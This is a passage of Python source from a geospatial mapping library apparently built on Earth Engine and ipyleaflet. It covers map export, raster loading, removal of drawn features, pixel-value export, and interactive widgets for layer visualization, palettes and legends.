os.makedirs(out_dir)
if add_layer_control and self.layer_control is None:
layer_control = ipyleaflet.LayersControl(position="topright")
self.layer_control = layer_control
self.add_control(layer_control)
before_width = self.layout.width
before_height = self.layout.height
if not isinstance(width, str):
print("width must be a string.")
return
elif width.endswith("px") or width.endswith("%"):
pass
else:
print("width must end with px or %")
return
if not isinstance(height, str):
print("height must be a string.")
return
elif not height.endswith("px"):
print("height must end with px")
return
self.layout.width = width
self.layout.height = height
self.save(outfile, title=title)
self.layout.width = before_width
self.layout.height = before_height
except Exception as e:
raise Exception(e)
def to_image(self, outfile=None, monitor=1):
"""Saves the map as a PNG or JPG image.
Args:
outfile (str, optional): The output file path to the image. Defaults to None.
monitor (int, optional): The monitor to take the screenshot. Defaults to 1.
"""
if outfile is None:
outfile = os.path.join(os.getcwd(), "my_map.png")
if outfile.endswith(".png") or outfile.endswith(".jpg"):
pass
else:
print("The output file must be a PNG or JPG image.")
return
work_dir = os.path.dirname(outfile)
if not os.path.exists(work_dir):
os.makedirs(work_dir)
screenshot = screen_capture(outfile, monitor)
self.screenshot = screenshot
def toolbar_reset(self):
"""Reset the toolbar so that no tool is selected."""
toolbar_grid = self.toolbar
for tool in toolbar_grid.children:
tool.value = False
def add_raster(
self,
image,
bands=None,
layer_name=None,
colormap=None,
x_dim="x",
y_dim="y",
):
"""Adds a local raster dataset to the map.
Args:
image (str): The image file path.
bands (int or list, optional): The image bands to use. It can be either a number (e.g., 1) or a list (e.g., [3, 2, 1]). Defaults to None.
layer_name (str, optional): The layer name to use for the raster. Defaults to None.
colormap (str, optional): The name of the colormap to use for the raster, such as 'gray' and 'terrain'. More can be found at https://matplotlib.org/3.1.0/tutorials/colors/colormaps.html. Defaults to None.
x_dim (str, optional): The x dimension. Defaults to 'x'.
y_dim (str, optional): The y dimension. Defaults to 'y'.
"""
try:
import xarray_leaflet
except Exception:
# import platform
# if platform.system() != "Windows":
# # install_from_github(
# # url='https://github.com/davidbrochart/xarray_leaflet')
# check_install('xarray_leaflet')
# import xarray_leaflet
# else:
raise ImportError(
"You need to install xarray_leaflet first. See https://github.com/davidbrochart/xarray_leaflet"
)
import warnings
# import xarray as xr
import matplotlib.pyplot as plt
import numpy as np
import rioxarray
warnings.simplefilter("ignore")
if not os.path.exists(image):
print("The image file does not exist.")
return
if colormap is None:
colormap = plt.cm.inferno
if layer_name is None:
layer_name = "Layer_" + random_string()
if isinstance(colormap, str):
colormap = plt.cm.get_cmap(name=colormap)
da = rioxarray.open_rasterio(image, masked=True)
# print(da.rio.nodata)
multi_band = False
if len(da.band) > 1:
multi_band = True
if bands is None:
bands = [3, 2, 1]
else:
bands = 1
if multi_band:
da = da.rio.write_nodata(0)
else:
da = da.rio.write_nodata(np.nan)
da = da.sel(band=bands)
# crs = da.rio.crs
# nan = da.attrs['nodatavals'][0]
# da = da / da.max()
# # if multi_band:
# da = xr.where(da == nan, np.nan, da)
# da = da.rio.write_nodata(0)
# da = da.rio.write_crs(crs)
if multi_band and type(bands) == list:
layer = da.leaflet.plot(self, x_dim=x_dim, y_dim=y_dim, rgb_dim="band")
else:
layer = da.leaflet.plot(self, x_dim=x_dim, y_dim=y_dim, colormap=colormap)
layer.name = layer_name
def remove_drawn_features(self):
"""Removes user-drawn geometries from the map"""
if self.draw_layer is not None:
self.remove_layer(self.draw_layer)
self.draw_count = 0
self.draw_features = []
self.draw_last_feature = None
self.draw_layer = None
self.draw_last_json = None
self.draw_last_bounds = None
self.user_roi = None
self.user_rois = None
self.chart_values = []
self.chart_points = []
self.chart_labels = None
if self.draw_control is not None:
self.draw_control.clear()
def remove_last_drawn(self):
"""Removes user-drawn geometries from the map"""
if self.draw_layer is not None:
collection = ee.FeatureCollection(self.draw_features[:-1])
ee_draw_layer = ee_tile_layer(
collection, {"color": "blue"}, "Drawn Features", True, 0.5
)
if self.draw_count == 1:
self.remove_drawn_features()
else:
self.substitute_layer(self.draw_layer, ee_draw_layer)
self.draw_layer = ee_draw_layer
self.draw_count -= 1
self.draw_features = self.draw_features[:-1]
self.draw_last_feature = self.draw_features[-1]
self.draw_layer = ee_draw_layer
self.draw_last_json = None
self.draw_last_bounds = None
self.user_roi = ee.Feature(
collection.toList(collection.size()).get(
collection.size().subtract(1)
)
).geometry()
self.user_rois = collection
self.chart_values = self.chart_values[:-1]
self.chart_points = self.chart_points[:-1]
# self.chart_labels = None
def extract_values_to_points(self, filename):
"""Exports pixel values to a csv file based on user-drawn geometries.
Args:
filename (str): The output file path to the csv file or shapefile.
"""
import csv
filename = os.path.abspath(filename)
allowed_formats = ["csv", "shp"]
ext = filename[-3:]
if ext not in allowed_formats:
print(
"The output file must be one of the following: {}".format(
", ".join(allowed_formats)
)
)
return
out_dir = os.path.dirname(filename)
out_csv = filename[:-3] + "csv"
out_shp = filename[:-3] + "shp"
if not os.path.exists(out_dir):
os.makedirs(out_dir)
count = len(self.chart_points)
out_list = []
if count > 0:
header = ["id", "longitude", "latitude"] + self.chart_labels
out_list.append(header)
for i in range(0, count):
id = i + 1
line = [id] + self.chart_points[i] + self.chart_values[i]
out_list.append(line)
with open(out_csv, "w", newline="") as f:
writer = csv.writer(f)
writer.writerows(out_list)
if ext == "csv":
print(f"The csv file has been saved to: {out_csv}")
else:
csv_to_shp(out_csv, out_shp)
print(f"The shapefile has been saved to: {out_shp}")
def create_vis_widget(self, layer_dict):
"""Create a GUI for changing layer visualization parameters interactively.
Args:
layer_dict (dict): A dict containning information about the layer. It is an element from Map.ee_layer_dict.
Returns:
object: An ipywidget.
"""
import matplotlib as mpl
import matplotlib.pyplot as plt
ee_object = layer_dict["ee_object"]
ee_layer = layer_dict["ee_layer"]
vis_params = layer_dict["vis_params"]
layer_name = ee_layer.name
layer_opacity = ee_layer.opacity
band_names = None
min_value = 0
max_value = 100
sel_bands = None
layer_palette = []
layer_gamma = 1
left_value = 0
right_value = 10000
self.colorbar_widget = widgets.Output(layout=widgets.Layout(height="60px"))
self.colorbar_ctrl = ipyleaflet.WidgetControl(
widget=self.colorbar_widget, position="bottomright"
)
self.add_control(self.colorbar_ctrl)
# def vdir(obj): # Get branca colormap list
# return [x for x in dir(obj) if not x.startswith("_")]
if isinstance(ee_object, ee.Image):
band_names = ee_object.bandNames().getInfo()
band_count = len(band_names)
if "min" in vis_params.keys():
min_value = vis_params["min"]
if min_value < left_value:
left_value = min_value - max_value
if "max" in vis_params.keys():
max_value = vis_params["max"]
right_value = 2 * max_value
if "gamma" in vis_params.keys():
layer_gamma = vis_params["gamma"]
if "bands" in vis_params.keys():
sel_bands = vis_params["bands"]
if "palette" in vis_params.keys():
layer_palette = [
color.replace("#", "") for color in list(vis_params["palette"])
]
vis_widget = widgets.VBox(
layout=widgets.Layout(padding="5px 5px 5px 8px", width="330px")
)
label = widgets.Label(value=f"{layer_name} visualization parameters")
radio1 = widgets.RadioButtons(
options=["1 band (Grayscale)"], layout={"width": "max-content"}
)
radio2 = widgets.RadioButtons(
options=["3 bands (RGB)"], layout={"width": "max-content"}
)
radio1.index = None
radio2.index = None
dropdown_width = "98px"
band1_dropdown = widgets.Dropdown(
options=band_names,
value=band_names[0],
layout=widgets.Layout(width=dropdown_width),
)
band2_dropdown = widgets.Dropdown(
options=band_names,
value=band_names[0],
layout=widgets.Layout(width=dropdown_width),
)
band3_dropdown = widgets.Dropdown(
options=band_names,
value=band_names[0],
layout=widgets.Layout(width=dropdown_width),
)
bands_hbox = widgets.HBox()
legend_chk = widgets.Checkbox(
value=False,
description="Legend",
indent=False,
layout=widgets.Layout(width="70px"),
)
color_picker = widgets.ColorPicker(
concise=False,
value="#000000",
layout=widgets.Layout(width="116px"),
style={"description_width": "initial"},
)
add_color = widgets.Button(
icon="plus",
tooltip="Add a hex color string to the palette",
layout=widgets.Layout(width="32px"),
)
del_color = widgets.Button(
icon="minus",
tooltip="Remove a hex color string from the palette",
layout=widgets.Layout(width="32px"),
)
reset_color = widgets.Button(
icon="eraser",
tooltip="Remove all color strings from the palette",
layout=widgets.Layout(width="34px"),
)
classes = widgets.Dropdown(
options=["Any"] + [str(i) for i in range(3, 13)],
description="Classes:",
layout=widgets.Layout(width="115px"),
style={"description_width": "initial"},
)
colormap = widgets.Dropdown(
options=plt.colormaps(),
value=None,
description="Colormap:",
layout=widgets.Layout(width="181px"),
style={"description_width": "initial"},
)
def classes_changed(change):
if change["new"]:
selected = change["owner"].value
if colormap.value is not None:
n_class = None
if selected != "Any":
n_class = int(classes.value)
colors = plt.cm.get_cmap(colormap.value, n_class)
cmap_colors = [
mpl.colors.rgb2hex(colors(i))[1:] for i in range(colors.N)
]
_, ax = plt.subplots(figsize=(6, 0.4))
cmap = mpl.colors.LinearSegmentedColormap.from_list(
"custom", to_hex_colors(cmap_colors), N=256
)
norm = mpl.colors.Normalize(
vmin=value_range.value[0], vmax=value_range.value[1]
)
mpl.colorbar.ColorbarBase(
ax, norm=norm, cmap=cmap, orientation="horizontal"
)
palette.value = ", ".join([color for color in cmap_colors])
if self.colorbar_widget is None:
self.colorbar_widget = widgets.Output(
layout=widgets.Layout(height="60px")
)
if self.colorbar_ctrl is None:
self.colorbar_ctrl = ipyleaflet.WidgetControl(
widget=self.colorbar_widget, position="bottomright"
)
self.add_control(self.colorbar_ctrl)
colorbar_output = self.colorbar_widget
with colorbar_output:
colorbar_output.clear_output()
plt.show()
if len(palette.value) > 0 and "," in palette.value:
labels = [
f"Class {i+1}"
for i in range(len(palette.value.split(",")))
]
legend_labels.value = ", ".join(labels)
classes.observe(classes_changed, "value")
palette = widgets.Text(
value=", ".join(layer_palette),
placeholder="List of hex color code (RRGGBB)",
description="Palette:",
tooltip="Enter a list of hex color code (RRGGBB)",
layout=widgets.Layout(width="300px"),
style={"description_width": "initial"},
)
def add_color_clicked(b):
if color_picker.value is not None:
if len(palette.value) == 0:
palette.value = color_picker.value[1:]
else:
palette.value += ", " + color_picker.value[1:]
def del_color_clicked(b):
if "," in palette.value:
items = [item.strip() for item in palette.value.split(",")]
palette.value = ", ".join(items[:-1])
else:
palette.value = ""
def reset_color_clicked(b):
palette.value = ""
add_color.on_click(add_color_clicked)
del_color.on_click(del_color_clicked)
reset_color.on_click(reset_color_clicked)
spacer = widgets.Label(layout=widgets.Layout(width="5px"))
v_spacer = widgets.Label(layout=widgets.Layout(height="5px"))
radio_btn = widgets.HBox([radio1, spacer, spacer, spacer, radio2])
value_range = widgets.FloatRangeSlider(
value=[min_value, max_value],
min=left_value,
max=right_value,
step=0.1,
description="Range:",
disabled=False,
continuous_update=False,
readout=True,
readout_format=".1f",
layout=widgets.Layout(width="300px"),
style={"description_width": "45px"},
)
range_hbox = widgets.HBox([value_range, spacer])
opacity = widgets.FloatSlider(
value=layer_opacity,
min=0,
max=1,
step=0.01,
description="Opacity:",
continuous_update=False,
readout=True,
readout_format=".2f",
layout=widgets.Layout(width="320px"),
style={"description_width": "50px"},
)
gamma = widgets.FloatSlider(
value=layer_gamma,
min=0.1,
max=10,
step=0.01,
description="Gamma:",
continuous_update=False,
readout=True,
readout_format=".2f",
layout=widgets.Layout(width="320px"),
style={"description_width": "50px"},
)
legend_chk = widgets.Checkbox(
value=False,
description="Legend",
indent=False,
layout=widgets.Layout(width="70px"),
)
linear_chk = widgets.Checkbox(
value=True,
description="Linear colormap",
indent=False,
layout=widgets.Layout(width="150px"),
)
step_chk = widgets.Checkbox(
value=False,
description="Step colormap",
indent=False,
layout=widgets.Layout(width="140px"),
)
legend_title = widgets.Text(
value="Legend",
description="Legend title:",
tooltip="Enter a title for the legend",
layout=widgets.Layout(width="300px"),
style={"description_width": "initial"},
)
legend_labels = widgets.Text(
value="Class 1, Class 2, Class 3",
description="Legend labels:",
tooltip="Enter a a list of labels for the legend",
layout=widgets.Layout(width="300px"),
style={"description_width": "initial"},
)
colormap_hbox = widgets.HBox([linear_chk, step_chk])
legend_vbox = widgets.VBox()
def linear_chk_changed(change):
if change["new"]:
step_chk.value = False
legend_vbox.children = [colormap_hbox]
else:
step_chk.value = True
def step_chk_changed(change):
if change["new"]:
linear_chk.value = False
if len(layer_palette) > 0:
legend_labels.value = ",".join(
[
"Class " + str(i)
for i in range(1, len(layer_palette) + 1)
]
)
legend_vbox.children = [
colormap_hbox,
legend_title,
legend_labels,
]
else:
linear_chk.value = True
linear_chk.observe(linear_chk_changed, "value")
step_chk.observe(step_chk_changed, "value")
def colormap_changed(change):
if change["new"]:
n_class = None
if classes.value != "Any":
n_class = int(classes.value)
colors = plt.cm.get_cmap(colormap.value, n_class)
cmap_colors = [
mpl.colors.rgb2hex(colors(i))[1:] for i in range(colors.N)
]
_, ax = plt.subplots(figsize=(6, 0.4))
cmap = mpl.colors.LinearSegmentedColormap.from_list(
"custom", to_hex_colors(cmap_colors), N=256
)
norm = mpl.colors.Normalize(
vmin=value_range.value[0], vmax=value_range.value[1]
)
mpl.colorbar.ColorbarBase(
ax, norm=norm, cmap=cmap, orientation="horizontal"
)
palette.value = ", ".join(cmap_colors)
if self.colorbar_widget is None:
self.colorbar_widget = widgets.Output(
layout=widgets.Layout(height="60px")
)
if self.colorbar_ctrl is None:
self.colorbar_ctrl = ipyleaflet.WidgetControl(
widget=self.colorbar_widget, position="bottomright"
)
self.add_control(self.colorbar_ctrl)
colorbar_output = self.colorbar_widget
with colorbar_output:
colorbar_output.clear_output()
plt.show()
# display(colorbar)
if len(palette.value) > 0 and "," in palette.value:
labels = [
f"Class {i+1}" for i in range(len(palette.value.split(",")))
]
legend_labels.value = ", ".join(labels)
colormap.observe(colormap_changed, "value")
btn_width = "97.5px"
import_btn = widgets.Button(
description="Import",
button_style="primary",
tooltip="Import vis params to notebook",
layout=widgets.Layout(width=btn_width),
)
apply_btn = widgets.Button(
description="Apply",
tooltip="Apply vis params to the layer",
layout=widgets.Layout(width=btn_width),
)
close_btn = widgets.Button(
description="Close",
tooltip="Close vis params diaglog",
layout=widgets.Layout(width=btn_width),
)
def import_btn_clicked(b):
vis = {}
if radio1.index == 0:
vis["bands"] = [band1_dropdown.value]
if len(palette.value) > 0:
vis["palette"] = palette.value.split(",")
else:
vis["bands"] = [
band1_dropdown.value,
band2_dropdown.value,
band3_dropdown.value,
]
vis["min"] = value_range.value[0]
vis["max"] = value_range.value[1]
vis["opacity"] = opacity.value
vis["gamma"] = gamma.value
create_code_cell(f"vis_params = {str(vis)}")
def apply_btn_clicked(b):
vis = {}
if radio1.index == 0:
vis["bands"] = [band1_dropdown.value]
if len(palette.value) > 0:
vis["palette"] = [c.strip() for c in palette.value.split(",")]
else:
vis["bands"] = [
band1_dropdown.value,
band2_dropdown.value,
band3_dropdown.value,
]
vis["gamma"] = gamma.value
vis["min"] = value_range.value[0]
vis["max"] = value_range.value[1]
self.addLayer(ee_object, vis, layer_name, True, opacity.value)
ee_layer.visible = False
if legend_chk.value:
if (
self.colorbar_ctrl is not None
and self.colorbar_ctrl in self.controls
):
self.remove_control(self.colorbar_ctrl)
self.colorbar_ctrl.close()
self.colorbar_widget.close()
if (
"colorbar" in layer_dict.keys()
and layer_dict["colorbar"] in self.controls
):
self.remove_control(layer_dict["colorbar"])
layer_dict["colorbar"] = None
if linear_chk.value:
if (
"legend" in layer_dict.keys()
and layer_dict["legend"] in self.controls
):
self.remove_control(layer_dict["legend"])
layer_dict["legend"] = None
if len(palette.value) > 0 and "," in palette.value:
colors = to_hex_colors(
[color.strip() for color in palette.value.split(",")]
)
self.add_colorbar(
vis_params={
"palette": colors,
"min": value_range.value[0],
"max": value_range.value[1],
},
layer_name=layer_name,
)
elif step_chk.value:
if len(palette.value) > 0 and "," in palette.value:
colors = to_hex_colors(
[color.strip() for color in palette.value.split(",")]
)
labels = [
label.strip()
for label in legend_labels.value.split(",")
]
self.add_legend(
legend_title=legend_title.value,
legend_keys=labels,
legend_colors=colors,
layer_name=layer_name,
)
else:
if radio1.index == 0 and "palette" in vis:
self.colorbar_widget.clear_output()
with self.colorbar_widget:
_, ax = plt.subplots(figsize=(6, 0.4))
colors = to_hex_colors(vis["palette"])
cmap = mpl.colors.LinearSegmentedColormap.from_list(
"custom", colors, N=256
)
norm = mpl.colors.Normalize(
vmin=vis["min"], vmax=vis["max"]
)
mpl.colorbar.ColorbarBase(
ax, norm=norm, cmap=cmap, orientation="horizontal"
)
plt.show()
if (
"colorbar" in layer_dict.keys()
and layer_dict["colorbar"] in self.controls
):
self.remove_control(layer_dict["colorbar"])
layer_dict["colorbar"] = None
if (
"legend" in layer_dict.keys()
and layer_dict["legend"] in self.controls
):
self.remove_control(layer_dict["legend"])
layer_dict["legend"] = None
def close_btn_clicked(b):
if self.vis_control in self.controls:
self.remove_control(self.vis_control)
self.vis_control = None
self.vis_widget.close()
if (
self.colorbar_ctrl is not None
and self.colorbar_ctrl in self.controls
):
self.remove_control(self.colorbar_ctrl)
self.colorbar_ctrl = None
self.colorbar_widget.close()
import_btn.on_click(import_btn_clicked)
apply_btn.on_click(apply_btn_clicked)
close_btn.on_click(close_btn_clicked)
color_hbox = widgets.HBox(
[legend_chk, color_picker, add_color, del_color, reset_color]
)
btn_hbox = widgets.HBox([import_btn, apply_btn, close_btn])
gray_box = [
label,
radio_btn,
bands_hbox,
v_spacer,
range_hbox,
opacity,
gamma,
widgets.HBox([classes, colormap]),
palette,
color_hbox,
legend_vbox,
btn_hbox,
]
rgb_box = [
label,
radio_btn,
bands_hbox,
v_spacer,
range_hbox,
opacity,
gamma,
btn_hbox,
]
def legend_chk_changed(change):
if change["new"]:
linear_chk.value = True
legend_vbox.children = [
widgets.HBox([linear_chk, step_chk]),
# legend_title,
# legend_labels,
]
else:
legend_vbox.children = []
legend_chk.observe(legend_chk_changed, "value")
if band_count < 3:
radio1.index = 0
band1_dropdown.layout.width = "300px"
bands_hbox.children = [band1_dropdown]
vis_widget.children = gray_box
legend_chk.value = False
if len(palette.value) > 0 and "," in palette.value:
import matplotlib as mpl
import matplotlib.pyplot as plt
colors = to_hex_colors(
[color.strip() for color in palette.value.split(",")]
)
self.colorbar_widget.clear_output()
with self.colorbar_widget:
_, ax = plt.subplots(figsize=(6, 0.4))
cmap = mpl.colors.LinearSegmentedColormap.from_list(
"custom", colors, N=256
)
norm = mpl.colors.Normalize(
vmin=value_range.value[0], vmax=value_range.value[1]
)
mpl.colorbar.ColorbarBase(
ax, norm=norm, cmap=cmap, orientation="horizontal"
)
plt.show()
else:
radio2.index = 0
if (sel_bands is None) or (len(sel_bands) < 2):
sel_bands = band_names[0:3]
band1_dropdown.value = sel_bands[0]
band2_dropdown.value = sel_bands[1]
band3_dropdown.value = sel_bands[2]
bands_hbox.children = [
band1_dropdown,
band2_dropdown,
band3_dropdown,
]
vis_widget.children = rgb_box
def radio1_observer(sender):
radio2.unobserve(radio2_observer, names=["value"])
radio2.index = None
radio2.observe(radio2_observer, names=["value"])
band1_dropdown.layout.width = "300px"
bands_hbox.children = [band1_dropdown]
palette.value = ", ".join(layer_palette)
palette.disabled = False
color_picker.disabled = False
add_color.disabled = False
del_color.disabled = False
reset_color.disabled = False
vis_widget.children = gray_box
if len(palette.value) > 0 and "," in palette.value:
colors = [color.strip() for color in palette.value.split(",")]
_, ax = plt.subplots(figsize=(6, 0.4))
cmap = mpl.colors.LinearSegmentedColormap.from_list(
"custom", to_hex_colors(colors), N=256
)
norm = mpl.colors.Normalize(vmin=0, vmax=1)
mpl.colorbar.ColorbarBase(
ax, norm=norm, cmap=cmap, orientation="horizontal"
)
self.colorbar_widget = widgets.Output(
layout=widgets.Layout(height="60px")
)
self.colorbar_ctrl = ipyleaflet.WidgetControl(
widget=self.colorbar_widget, position="bottomright"
)
if self.colorbar_ctrl not in self.controls:
self.add_control(self.colorbar_ctrl)
self.colorbar_widget.clear_output()
with self.colorbar_widget:
plt.show()
def radio2_observer(sender):
radio1.unobserve(radio1_observer, names=["value"])
radio1.index = None
radio1.observe(radio1_observer, names=["value"])
band1_dropdown.layout.width = dropdown_width
bands_hbox.children = [
band1_dropdown,
band2_dropdown,
band3_dropdown,
]
palette.value = ""
palette.disabled = True
color_picker.disabled = True
add_color.disabled = True
del_color.disabled = True
reset_color.disabled = True
vis_widget.children = rgb_box
if (
self.colorbar_ctrl is not None
and self.colorbar_ctrl in self.controls
):
self.remove_control(self.colorbar_ctrl)
self.colorbar_ctrl.close()
self.colorbar_widget.close()
radio1.observe(radio1_observer, names=["value"])
radio2.observe(radio2_observer, names=["value"])
return vis_widget
elif isinstance(ee_object, ee.FeatureCollection):
vis_widget = widgets.VBox(
layout=widgets.Layout(padding="5px 5px 5px 8px", width="330px")
)
label = widgets.Label(value=f"{layer_name} visualization parameters")
new_layer_name = widgets.Text(
value=f"{layer_name} style",
description="New layer name:",
style={"description_width": "initial"},
)
color = widgets.ColorPicker(
concise=False,
value="#000000",
description="Color:",
layout=widgets.Layout(width="140px"),
style={"description_width": "initial"},
)
color_opacity = widgets.FloatSlider(
value=layer_opacity,
min=0,
max=1,
step=0.01,
description="Opacity:",
continuous_update=True,
readout=False,
# readout_format=".2f",
layout=widgets.Layout(width="130px"),
style={"description_width": "50px"},
)
color_opacity_label = widgets.Label(
style={"description_width": "initial"},
layout=widgets.Layout(padding="0px"),
)
widgets.jslink((color_opacity, "value"), (color_opacity_label, "value"))
point_size = widgets.IntText(
value=3,
description="Point size:",
layout=widgets.Layout(width="110px"),
style={"description_width": "initial"},
)
point_shape_options = [
"circle",
"square",
"diamond",
"cross",
"plus",
"pentagram",
"hexagram",
"triangle",
"triangle_up",
"triangle_down",
"triangle_left",
"triangle_right",
"pentagon",
"hexagon",
"star5",
"star6",
]
point_shape = widgets.Dropdown(
options=point_shape_options,
value="circle",
description="Point shape:",
layout=widgets.Layout(width="185px"),
style={"description_width": "initial"},
)
line_width = widgets.IntText(
value=2,
description="Line width:",
layout=widgets.Layout(width="110px"),
style={"description_width": "initial"},
)
line_type = widgets.Dropdown(
options=["solid", "dotted", "dashed"],
value="solid",
description="Line type:",
layout=widgets.Layout(width="185px"),
style={"description_width": "initial"},
)
fill_color = widgets.ColorPicker(
concise=False,
value="#000000",
description="Fill Color:",
layout=widgets.Layout(width="160px"),
style={"description_width": "initial"},
)
fill_color_opacity = widgets.FloatSlider(
value=0.66,
min=0,
max=1,
step=0.01,
description="Opacity:",
continuous_update=True,
readout=False,
# readout_format=".2f",
layout=widgets.Layout(width="110px"),
style={"description_width": "50px"},
)
fill_color_opacity_label = widgets.Label(
style={"description_width": "initial"},
layout=widgets.Layout(padding="0px"),
)
widgets.jslink(
(fill_color_opacity, "value"),
(fill_color_opacity_label, "value"),
)
color_picker = widgets.ColorPicker(
concise=False,
value="#000000",
layout=widgets.Layout(width="116px"),
style={"description_width": "initial"},
)
add_color = widgets.Button(
icon="plus",
tooltip="Add a hex color string to the palette",
layout=widgets.Layout(width="32px"),
)
del_color = widgets.Button(
icon="minus",
tooltip="Remove a hex color string from the palette",
layout=widgets.Layout(width="32px"),
)
reset_color = widgets.Button(
icon="eraser",
tooltip="Remove all color strings from the palette",
layout=widgets.Layout(width="34px"),
)
palette = widgets.Text(
value="",
placeholder="List of hex code (RRGGBB) separated by comma",
description="Palette:",
tooltip="Enter a list of hex code (RRGGBB) separated by comma",
layout=widgets.Layout(width="300px"),
style={"description_width": "initial"},
)
legend_title = widgets.Text(
value="Legend",
description="Legend title:",
tooltip="Enter a title for the legend",
layout=widgets.Layout(width="300px"),
style={"description_width": "initial"},
)
legend_labels = widgets.Text(
value="Labels",
description="Legend labels:",
tooltip="Enter a a list of labels for the legend",
layout=widgets.Layout(width="300px"),
style={"description_width": "initial"},
)
def add_color_clicked(b):
if color_picker.value is not None:
if len(palette.value) == 0:
palette.value = color_picker.value[1:]
else:
palette.value += ", " + color_picker.value[1:]
def del_color_clicked(b):
if "," in palette.value:
items = [item.strip() for item in palette.value.split(",")]
palette.value = ", ".join(items[:-1])
else:
palette.value = ""
def reset_color_clicked(b):
palette.value = ""
add_color.on_click(add_color_clicked)
del_color.on_click(del_color_clicked)
reset_color.on_click(reset_color_clicked)
field = widgets.Dropdown(
options=[],
value=None,
description="Field:",
layout=widgets.Layout(width="140px"),
style={"description_width": "initial"},
)
field_values = widgets.Dropdown(
options=[],
value=None,
description="Values:",
layout=widgets.Layout(width="156px"),
style={"description_width": "initial"},
)
classes = widgets.Dropdown(
options=["Any"] + [str(i) for i in range(3, 13)],
description="Classes:",
layout=widgets.Layout(width="115px"),
style={"description_width": "initial"},
)
colormap = widgets.Dropdown(
options=["viridis"],
value="viridis",
description="Colormap:",
layout=widgets.Layout(width="181px"),
style={"description_width": "initial"},
)
def classes_changed(change):
if change["new"]:
selected = change["owner"].value
if colormap.value is not None:
n_class = None
if selected != "Any":
n_class = int(classes.value)
colors = plt.cm.get_cmap(colormap.value, n_class)
cmap_colors = [
mpl.colors.rgb2hex(colors(i))[1:] for i in range(colors.N)
]
_, ax = plt.subplots(figsize=(6, 0.4))
cmap = mpl.colors.LinearSegmentedColormap.from_list(
"custom", to_hex_colors(cmap_colors), N=256
)
norm = mpl.colors.Normalize(vmin=0, vmax=1)
mpl.colorbar.ColorbarBase(
ax, norm=norm, cmap=cmap, orientation="horizontal"
)
palette.value = ", ".join([color for color in cmap_colors])
if self.colorbar_widget is None:
self.colorbar_widget = widgets.Output(
layout=widgets.Layout(height="60px")
)
if self.colorbar_ctrl is None:
self.colorbar_ctrl = ipyleaflet.WidgetControl(
widget=self.colorbar_widget, position="bottomright"
)
self.add_control(self.colorbar_ctrl)
colorbar_output = self.colorbar_widget
with colorbar_output:
colorbar_output.clear_output()
plt.show()
if len(palette.value) > 0 and "," in palette.value:
labels = [
f"Class {i+1}"
for i in range(len(palette.value.split(",")))
]
legend_labels.value = ", ".join(labels)
classes.observe(classes_changed, "value")
def colormap_changed(change):
if change["new"]:
n_class = None
if classes.value != "Any":
n_class = int(classes.value)
colors = plt.cm.get_cmap(colormap.value, n_class)
cmap_colors = [
mpl.colors.rgb2hex(colors(i))[1:] for i in range(colors.N)
]
_, ax = plt.subplots(figsize=(6, 0.4))
cmap = mpl.colors.LinearSegmentedColormap.from_list(
"custom", to_hex_colors(cmap_colors), N=256
)
norm = mpl.colors.Normalize(vmin=0, vmax=1)
mpl.colorbar.ColorbarBase(
ax, norm=norm, cmap=cmap, orientation="horizontal"
)
palette.value = ", ".join(cmap_colors)
if self.colorbar_widget is None:
self.colorbar_widget = widgets.Output(
layout=widgets.Layout(height="60px")
)
if self.colorbar_ctrl is None:
self.colorbar_ctrl = ipyleaflet.WidgetControl(
widget=self.colorbar_widget, position="bottomright"
)
self.add_control(self.colorbar_ctrl)
colorbar_output = self.colorbar_widget
with colorbar_output:
colorbar_output.clear_output()
plt.show()
# display(colorbar)
if len(palette.value) > 0 and "," in palette.value:
labels = [
f"Class {i+1}" for i in range(len(palette.value.split(",")))
]
legend_labels.value = ", ".join(labels)
colormap.observe(colormap_changed, "value")
btn_width = "97.5px"
import_btn = widgets.Button(
description="Import",
button_style="primary",
tooltip="Import vis params to notebook",
layout=widgets.Layout(width=btn_width),
)
apply_btn = widgets.Button(
description="Apply",
tooltip="Apply vis params to the layer",
layout=widgets.Layout(width=btn_width),
)
close_btn = widgets.Button(
description="Close",
tooltip="Close vis params diaglog",
layout=widgets.Layout(width=btn_width),
)
style_chk = widgets.Checkbox(
value=False,
description="Style by attribute",
indent=False,
layout=widgets.Layout(width="140px"),
)
legend_chk = widgets.Checkbox(
value=False,
description="Legend",
indent=False,
layout=widgets.Layout(width="70px"),
)
compute_label = widgets.Label(value="")
style_vbox = widgets.VBox([widgets.HBox([style_chk, compute_label])])
def style_chk_changed(change):
if change["new"]:
if (
self.colorbar_ctrl is not None
and self.colorbar_ctrl in self.controls
):
self.remove_control(self.colorbar_ctrl)
self.colorbar_ctrl.close()
self.colorbar_widget.close()
self.colorbar_widget = widgets.Output(
layout=widgets.Layout(height="60px")
)
self.colorbar_ctrl = ipyleaflet.WidgetControl(
widget=self.colorbar_widget, position="bottomright"
)
self.add_control(self.colorbar_ctrl)
fill_color.disabled = True
colormap.options = plt.colormaps()
colormap.value = "viridis"
style_vbox.children = [
widgets.HBox([style_chk, compute_label]),
widgets.HBox([field, field_values]),
widgets.HBox([classes, colormap]),
palette,
widgets.HBox(
[
legend_chk,
color_picker,
add_color,
del_color,
reset_color,
]
),
]
compute_label.value = "Computing ..."
field.options = (
ee.Feature(ee_object.first()).propertyNames().getInfo()
)
compute_label.value = ""
classes.value = "Any"
legend_chk.value = False
else:
fill_color.disabled = False
style_vbox.children = [widgets.HBox([style_chk, compute_label])]
compute_label.value = ""
if (
self.colorbar_ctrl is not None
and self.colorbar_ctrl in self.controls
):
self.remove_control(self.colorbar_ctrl)
self.colorbar_ctrl = None
self.colorbar_widget = None
# legend_chk.value = False
style_chk.observe(style_chk_changed, "value")
def legend_chk_changed(change):
if change["new"]:
style_vbox.children = list(style_vbox.children) + [
widgets.VBox([legend_title, legend_labels])
]
if len(palette.value) > 0 and "," in palette.value:
labels = [
f"Class {i+1}" for i in range(len(palette.value.split(",")))
]
legend_labels.value = ", ".join(labels)
else:
style_vbox.children = [
widgets.HBox([style_chk, compute_label]),
widgets.HBox([field, field_values]),
widgets.HBox([classes, colormap]),
palette,
widgets.HBox(
[
legend_chk,
color_picker,
add_color,
del_color,
reset_color,
]
),
]
legend_chk.observe(legend_chk_changed, "value")
def field_changed(change):
if change["new"]:
compute_label.value = "Computing ..."
options = ee_object.aggregate_array(field.value).getInfo()
if options is not None:
options = list(set(options))
options.sort()
field_values.options = options
compute_label.value = ""
field.observe(field_changed, "value")
def get_vis_params():
vis = {}
vis["color"] = color.value[1:] + str(
hex(int(color_opacity.value * 255))
)[2:].zfill(2)
if geometry_type(ee_object) in ["Point", "MultiPoint"]:
vis["pointSize"] = point_size.value
